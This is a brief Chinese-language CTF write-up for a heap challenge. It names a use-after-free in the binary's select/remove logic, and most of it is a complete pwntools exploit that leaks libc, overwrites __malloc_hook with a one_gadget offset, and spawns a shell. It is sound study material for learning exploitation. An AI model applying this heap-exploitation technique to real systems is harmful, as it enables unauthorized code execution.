今天同学丢给我了一道堆题

题目链接:Github

这是一道花里胡哨的堆题

选项

  1. Exit
  2. Add player
  3. Remove player
  4. Select player
  5. Edit player
  6. Show player
  7. Show team

漏洞点

select操作会把一个player指针赋值给一个全局变量,就算remove了那个player,全局变量依旧存着它的指针,且可以利用edit函数进行操作

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
from pwn import *
context(arch='i386',os='linux',log_level='debug')

sl = lambda x:io.sendline(x)
s = lambda x:io.send(x)
rn = lambda x:io.recv(x)
ru = lambda x:io.recvuntil(x, drop=True)
r = lambda :io.recv()
it = lambda: io.interactive()
success = lambda x, y:log.success(x + ' '+ hex(y))

binary = './choise'

io = process(binary)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def menu(c):
ru('Your choice: ')
sl(str(c))


def add(name, a, b, c, d):
menu(1)
ru('Found free slot: ')
idx = int(ru('\n'))
ru('Enter player name: ')
s(name)
ru('Enter attack points: ')
sl(str(a))
ru('Enter defense points: ')
sl(str(b))
ru('Enter speed: ')
sl(str(c))
ru('Enter precision: ')
sl(str(d))
return idx


def remove(idx):
menu(2)
ru('Enter index: ')
sl(str(idx))

def select(idx):
menu(3)
ru('Enter index: ')
sl(str(idx))

def edit(c, arg):
menu(4)
menu(c)
ru('Enter new name: ')
sleep(0.1)
s(arg)
sl('0')

def showP():
menu(5)

def showT():
menu(6)

add('a'*0x7f+'\n', 1,1,1,1)
add('a'*0x60+'\n', 1,1,1,1)
select(0)
remove(0)
showP()
ru('Name: ')
leak = u64(ru('\n').ljust(8, '\x00'))
success('leak address', leak)
base = leak - 0x3c4b78
success('libc base', base)
libc.address = base
malloc_hook = libc.sym['__malloc_hook']
chunk_addr = malloc_hook - 0x23
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
one_gadget = base + 0xf02a4
select(1)
remove(1)
edit(1, 'a'*0x60+'\n')
edit(1, p64(chunk_addr+0xff000000000000)+'\n')
edit(1, p64(chunk_addr)+'\n')
add('a'*0x60+'\n', 1,1,1,1)
add('a'*0x13+p64(one_gadget)[:-2]+'a'*0x47+'\n', 1,1,1,1)
select(1)
edit(1, 'a'*0x13+p64(one_gadget)[:-2]+'a'+'\n')
edit(1, 'a'*0x13+p64(one_gadget)[:-2]+'\n')
#gdb.attach(io,'b *0x401949')
#raw_input()
sl('1')
sl('1')
it()